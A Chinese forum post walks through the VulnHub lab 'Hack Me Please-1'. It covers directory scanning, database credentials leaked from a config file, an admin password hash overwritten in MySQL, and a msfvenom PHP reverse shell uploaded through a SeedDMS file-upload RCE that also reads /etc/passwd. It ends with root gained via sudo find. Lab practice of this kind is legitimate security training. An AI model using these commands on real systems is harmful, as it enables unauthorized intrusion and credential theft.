论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
安全
›
网络安全
›
『vulnhub系列』Hack Me Please-1
『vulnhub系列』Hack Me Please-1
不到断气不罢休
金牌会员
|
2024-5-31 22:18:51
|
显示全部楼层
|
阅读模式
楼主
主题
874
|
帖子
874
|
积分
2622
『vulnhub系列』Hack Me Please-1
下载地址:
https://www.vulnhub.com/entry/hack-me-please-1,731/
复制代码
信息搜集:
使用nmap举行探测存活主机,发现主机开启了80端口和3306端口
nmap 192.168.0.*
复制代码
访问80端口的web服务
使用dirsearch扫描目次,但是并没有可以访问的页面
dirsearch -u "http://192.168.0.132/"
复制代码
在main.js发现提示,有一个目次/seeddms51x/seeddms-5.1.22/
访问一下是一个登录页面
现在我们扫描这个目次
dirsearch -u "http://192.168.0.132/seeddms51x/seeddms-5.1.22/"
复制代码
访问/install页面
发现install不了
http://192.168.0.132/seeddms51x/seeddms-5.1.22/install/install.php
复制代码
说是要在conf目次下创建ENABLE_INSTALL_TOOL ,但是我们好像并不知道这个conf目次在哪里
可以确定当前seeddms51x/seeddms-5.1.22/ 目次下没有。现在我们向前每一级文件都爆破一下。
dirsearch -u "http://192.168.0.132/seeddms51x/"
复制代码
我们现在几乎可以确定conf就在/seeddms51x/这个目次文件下了
然后我们继续访问conf/ENABLE_INSTALL_TOOL和conf,发现都无法访问
继续爆破一下吧,终于发现了settings.xml
dirsearch -u "http://192.168.0.132/seeddms51x/conf"
复制代码
访问一下,我们找到了数据库的用户名和暗码都为:seeddms
我们登录mysql
mysql -h 192.168.0.132 -u seeddms -p
复制代码
show database; #查看数据库
复制代码
发现users表
use seeddms; #使用seeddms数据库
show tables; #查看表
复制代码
查看users表的内容发现用户名和暗码
+-------------+---------------------+--------------------+-----------------+ | Employee_id | Employee_first_name | Employee_last_name | Employee_passwd | +-------------+---------------------+--------------------+-----------------+ | 1 | saket | saurav | Saket@#$1337 | +-------------+---------------------+--------------------+-----------------+
select * from users; #查看users所有内容
复制代码
使用ID和暗码登录
登录失败,还有个表是tblUsers,我们查看一下,里面有一个admin和一个md5加密的暗码
select * from tblUsers;
复制代码
我们可以覆盖一下,首先使用python天生一个md5值21232f297a57a5a743894a0e4a801fc3
python3 -c 'import hashlib;print(hashlib.md5("admin".encode()).hexdigest())'
复制代码
修改数据库条目,修改乐成
update tblUsers set pwd='21232f297a57a5a743894a0e4a801fc3' where login='admin';
复制代码
使用我们修改后的暗码admin和用户名admin登录,登陆乐成
毛病利用:
我们发现添加文件选项是可以上传文件的,我们上传一个msfvenom天生的反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.129 lport=4444 -o re_shell.php
复制代码
我们此时搜一下seeddms的毛病
看到一个长途命令实行,看一下怎样实现
Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.
......
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
复制代码
步骤1,2:就是登录,然后上传一个文档,我们已经上传完成了例子用的是一个webshell,我们上传的是反弹shell,我们需要找到上传文件的位置
步骤3:查看文档的id,我们通过刚刚上传的反弹php序号为12
步骤4:访问/data/1048576/"document_id"/1.php 页面,在那之前先开启msf的监听,然后访问1.php
反弹乐成
提升权限:
我们查看/home页面发现存在用户saket
我们之前有在数据库中发现过saket,他的暗码是Saket@#$1337 我们登陆试试,登录乐成
su saket
复制代码
使用sudo -l 查看此用户可以以root权限实行的命令,发现是(ALL : ALL) ALL
那就自由发挥吧,这里使用find提权,乐成
sudo find /home -exec /bin/bash \;
复制代码
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
正序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
发新帖
回复
不到断气不罢休
金牌会员
这个人很懒什么都没写!
楼主热帖
Spark的一些重要概念
从SAP ECC升级到SAP S4HANA, 几个Key P ...
数据库设计员工管理系统
手绘地图深度解析:类型、风格、功能、 ...
【Redis高手修炼之路】初学Redis——概 ...
MySQL触发器
物联网无线数传通信模块设备常见的几种 ...
【高效学数据库】第一范式、第二范式、 ...
什么是计算机网络
php解决缓存击穿的问题
标签云
存储
挺好的
服务器
快速回复
返回顶部
返回列表